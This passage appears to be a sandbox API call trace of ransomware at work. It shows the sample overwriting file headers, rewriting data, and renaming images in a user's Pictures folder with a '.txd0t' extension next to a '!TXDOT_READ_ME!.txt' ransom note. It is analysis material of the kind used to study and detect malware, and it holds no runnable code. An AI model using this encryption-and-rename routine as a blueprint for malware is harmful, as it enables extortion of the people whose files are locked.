(pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\!TXDOT_READ_ME!.txt") returned 1 [0076.213] GetProcessHeap () returned 0xe30000 [0076.213] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0076.213] CloseHandle (hObject=0x47c) returned 1 [0076.214] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\EVRLdIxDOIvB-Fc9_h.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\evrldixdoivb-fc9_h.gif"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\EVRLdIxDOIvB-Fc9_h.gif.txd0t" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\evrldixdoivb-fc9_h.gif.txd0t")) returned 1 [0076.215] SetEvent (hEvent=0x414) returned 1 [0076.215] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0076.222] StrCpyW (in: psz1=0x53ef7b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Kiw0vwA10s0.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Kiw0vwA10s0.png") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Kiw0vwA10s0.png" [0076.222] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Kiw0vwA10s0.png", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Kiw0vwA10s0.png.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Kiw0vwA10s0.png.txd0t" [0076.222] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Kiw0vwA10s0.png.txd0t") returned 0 [0076.223] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Kiw0vwA10s0.png", dwFileAttributes=0x80) returned 1 [0076.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Kiw0vwA10s0.png" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\kiw0vwa10s0.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0076.223] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=73030) returned 1 [0076.223] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.223] WriteFile (in: hFile=0x46c, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0076.224] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffee0ba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.224] ReadFile (in: hFile=0x46c, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x11d40, lpNumberOfBytesRead=0x53ef770, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef770*=0x11d40, lpOverlapped=0x0) returned 1 [0076.226] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffee2c0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.226] WriteFile (in: hFile=0x46c, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x11d40, lpNumberOfBytesWritten=0x53ef774, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef774*=0x11d40, lpOverlapped=0x0) returned 1 [0076.226] FlushFileBuffers (hFile=0x46c) returned 1 [0076.233] GetProcessHeap () returned 0xe30000 [0076.233] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x114) returned 0xed18f8 [0076.233] StrCpyW (in: psz1=0xed18f8, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Kiw0vwA10s0.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Kiw0vwA10s0.png") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Kiw0vwA10s0.png" [0076.233] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Kiw0vwA10s0.png") returned="Kiw0vwA10s0.png" [0076.233] StrCpyW (in: psz1=0xed1946, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.233] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\!TXDOT_READ_ME!.txt") returned 1 [0076.233] GetProcessHeap () returned 0xe30000 [0076.233] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed18f8 | out: hHeap=0xe30000) returned 1 [0076.233] CloseHandle (hObject=0x46c) returned 1 [0076.235] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Kiw0vwA10s0.png" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\kiw0vwa10s0.png"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Kiw0vwA10s0.png.txd0t" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\kiw0vwa10s0.png.txd0t")) returned 1 [0076.236] SetEvent (hEvent=0x414) returned 1 [0076.236] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0076.243] StrCpyW (in: psz1=0x53ef7b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\qC_RZrVpYkb.bmp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\qC_RZrVpYkb.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\qC_RZrVpYkb.bmp" [0076.243] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\qC_RZrVpYkb.bmp", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\qC_RZrVpYkb.bmp.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\qC_RZrVpYkb.bmp.txd0t" [0076.243] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\qC_RZrVpYkb.bmp.txd0t") returned 0 [0076.243] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\qC_RZrVpYkb.bmp", dwFileAttributes=0x80) returned 1 [0076.244] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\qC_RZrVpYkb.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\qc_rzrvpykb.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0076.244] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=79505) returned 1 [0076.244] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.244] WriteFile (in: hFile=0x47c, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0076.245] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffec76f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.245] ReadFile (in: hFile=0x47c, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x13690, lpNumberOfBytesRead=0x53ef770, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef770*=0x13690, lpOverlapped=0x0) returned 1 [0076.246] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffec970, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.246] WriteFile (in: hFile=0x47c, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x13690, lpNumberOfBytesWritten=0x53ef774, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef774*=0x13690, lpOverlapped=0x0) returned 1 [0076.247] FlushFileBuffers (hFile=0x47c) returned 1 [0076.253] GetProcessHeap () returned 0xe30000 [0076.253] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x114) returned 0xed1b48 [0076.253] StrCpyW (in: psz1=0xed1b48, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\qC_RZrVpYkb.bmp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\qC_RZrVpYkb.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\qC_RZrVpYkb.bmp" [0076.253] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\qC_RZrVpYkb.bmp") returned="qC_RZrVpYkb.bmp" [0076.253] StrCpyW (in: psz1=0xed1b96, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.253] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\!TXDOT_READ_ME!.txt") returned 1 [0076.253] GetProcessHeap () returned 0xe30000 [0076.253] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1b48 | out: hHeap=0xe30000) returned 1 [0076.253] CloseHandle (hObject=0x47c) returned 1 [0076.255] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\qC_RZrVpYkb.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\qc_rzrvpykb.bmp"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\qC_RZrVpYkb.bmp.txd0t" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\qc_rzrvpykb.bmp.txd0t")) returned 1 [0076.256] SetEvent (hEvent=0x414) returned 1 [0076.256] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0076.263] StrCpyW (in: psz1=0x53ef7b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\VM0 JSKujUy.jpg" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\VM0 JSKujUy.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\VM0 JSKujUy.jpg" [0076.263] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\VM0 JSKujUy.jpg", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\VM0 JSKujUy.jpg.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\VM0 JSKujUy.jpg.txd0t" [0076.263] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\VM0 JSKujUy.jpg.txd0t") returned 0 [0076.263] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\VM0 JSKujUy.jpg", dwFileAttributes=0x80) returned 1 [0076.263] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\VM0 JSKujUy.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\vm0 jskujuy.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0076.264] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=54534) returned 1 [0076.264] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.264] WriteFile (in: hFile=0x46c, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0076.265] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffff28fa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.265] ReadFile (in: hFile=0x46c, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0xd500, lpNumberOfBytesRead=0x53ef770, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef770*=0xd500, lpOverlapped=0x0) returned 1 [0076.266] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffff2b00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.266] WriteFile (in: hFile=0x46c, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0xd500, lpNumberOfBytesWritten=0x53ef774, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef774*=0xd500, lpOverlapped=0x0) returned 1 [0076.266] FlushFileBuffers (hFile=0x46c) returned 1 [0076.272] GetProcessHeap () returned 0xe30000 [0076.272] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x114) returned 0xed16a8 [0076.272] StrCpyW (in: psz1=0xed16a8, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\VM0 JSKujUy.jpg" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\VM0 JSKujUy.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\VM0 JSKujUy.jpg" [0076.273] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\VM0 JSKujUy.jpg") returned="VM0 JSKujUy.jpg" [0076.273] StrCpyW (in: psz1=0xed16f6, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.273] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\!TXDOT_READ_ME!.txt") returned 1 [0076.273] GetProcessHeap () returned 0xe30000 [0076.273] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed16a8 | out: hHeap=0xe30000) returned 1 [0076.273] CloseHandle (hObject=0x46c) returned 1 [0076.274] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\VM0 JSKujUy.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\vm0 jskujuy.jpg"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\VM0 JSKujUy.jpg.txd0t" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\vm0 jskujuy.jpg.txd0t")) returned 1 [0076.275] SetEvent (hEvent=0x414) returned 1 [0076.275] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0076.282] StrCpyW (in: psz1=0x53ef7b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\xYVA6nzw2.bmp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\xYVA6nzw2.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\xYVA6nzw2.bmp" [0076.282] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\xYVA6nzw2.bmp", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\xYVA6nzw2.bmp.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\xYVA6nzw2.bmp.txd0t" [0076.282] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\xYVA6nzw2.bmp.txd0t") returned 0 [0076.282] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\xYVA6nzw2.bmp", dwFileAttributes=0x80) returned 1 [0076.283] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\xYVA6nzw2.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\xyva6nzw2.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0076.283] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=97155) returned 1 [0076.283] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.283] WriteFile (in: hFile=0x46c, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0076.284] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffe827d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.284] ReadFile (in: hFile=0x46c, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x17b80, lpNumberOfBytesRead=0x53ef770, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef770*=0x17b80, lpOverlapped=0x0) returned 1 [0076.286] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffe8480, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.286] WriteFile (in: hFile=0x46c, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x17b80, lpNumberOfBytesWritten=0x53ef774, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef774*=0x17b80, lpOverlapped=0x0) returned 1 [0076.286] FlushFileBuffers (hFile=0x46c) returned 1 [0076.293] GetProcessHeap () returned 0xe30000 [0076.293] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x110) returned 0xed2788 [0076.293] StrCpyW (in: psz1=0xed2788, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\xYVA6nzw2.bmp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\xYVA6nzw2.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\xYVA6nzw2.bmp" [0076.293] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\xYVA6nzw2.bmp") returned="xYVA6nzw2.bmp" [0076.293] StrCpyW (in: psz1=0xed27d6, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.293] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\!TXDOT_READ_ME!.txt") returned 1 [0076.294] GetProcessHeap () returned 0xe30000 [0076.294] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2788 | out: hHeap=0xe30000) returned 1 [0076.294] CloseHandle (hObject=0x46c) returned 1 [0076.296] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\xYVA6nzw2.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\xyva6nzw2.bmp"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\xYVA6nzw2.bmp.txd0t" (normalized: "c:\\users\\fd1hvy\\pictures\\kg7t_g4j-\\xyva6nzw2.bmp.txd0t")) returned 1 [0076.297] SetEvent (hEvent=0x414) returned 1 [0076.297] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0076.301] StrCpyW (in: psz1=0x53ef7d0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\nDbY.bmp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\nDbY.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\nDbY.bmp" [0076.301] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\nDbY.bmp", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\nDbY.bmp.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\nDbY.bmp.txd0t" [0076.301] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\nDbY.bmp.txd0t") returned 0 [0076.301] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\nDbY.bmp", dwFileAttributes=0x80) returned 1 [0076.302] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\nDbY.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\ndby.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0076.302] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=7108) returned 1 [0076.302] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.302] WriteFile (in: hFile=0x460, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0076.302] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffe23c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.302] ReadFile (in: hFile=0x460, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x1bc0, lpNumberOfBytesRead=0x53ef790, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef790*=0x1bc0, lpOverlapped=0x0) returned 1 [0076.302] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffe440, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.302] WriteFile (in: hFile=0x460, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x1bc0, lpNumberOfBytesWritten=0x53ef794, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef794*=0x1bc0, lpOverlapped=0x0) returned 1 [0076.303] FlushFileBuffers (hFile=0x460) returned 1 [0076.309] GetProcessHeap () returned 0xe30000 [0076.309] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf2) returned 0xe9d750 [0076.309] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\nDbY.bmp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\nDbY.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\nDbY.bmp" [0076.309] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\nDbY.bmp") returned="nDbY.bmp" [0076.309] StrCpyW (in: psz1=0xe9d78a, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.309] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\!TXDOT_READ_ME!.txt") returned 1 [0076.309] GetProcessHeap () returned 0xe30000 [0076.309] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0076.309] CloseHandle (hObject=0x460) returned 1 [0076.310] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\nDbY.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\ndby.bmp"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\nDbY.bmp.txd0t" (normalized: "c:\\users\\fd1hvy\\pictures\\ndby.bmp.txd0t")) returned 1 [0076.317] SetEvent (hEvent=0x414) returned 1 [0076.317] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0076.322] StrCpyW (in: psz1=0x53ef7c0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SjHlBfZqKWu.bmp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SjHlBfZqKWu.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SjHlBfZqKWu.bmp" [0076.322] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SjHlBfZqKWu.bmp", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SjHlBfZqKWu.bmp.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SjHlBfZqKWu.bmp.txd0t" [0076.322] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SjHlBfZqKWu.bmp.txd0t") returned 0 [0076.322] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SjHlBfZqKWu.bmp", dwFileAttributes=0x80) returned 1 [0076.323] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SjHlBfZqKWu.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\sjhlbfzqkwu.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0076.323] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=14393) returned 1 [0076.323] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.323] WriteFile (in: hFile=0x46c, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0076.323] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffffc5c7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.323] ReadFile (in: hFile=0x46c, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x3830, lpNumberOfBytesRead=0x53ef780, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef780*=0x3830, lpOverlapped=0x0) returned 1 [0076.323] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffffc7d0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.323] WriteFile (in: hFile=0x46c, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x3830, lpNumberOfBytesWritten=0x53ef784, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, 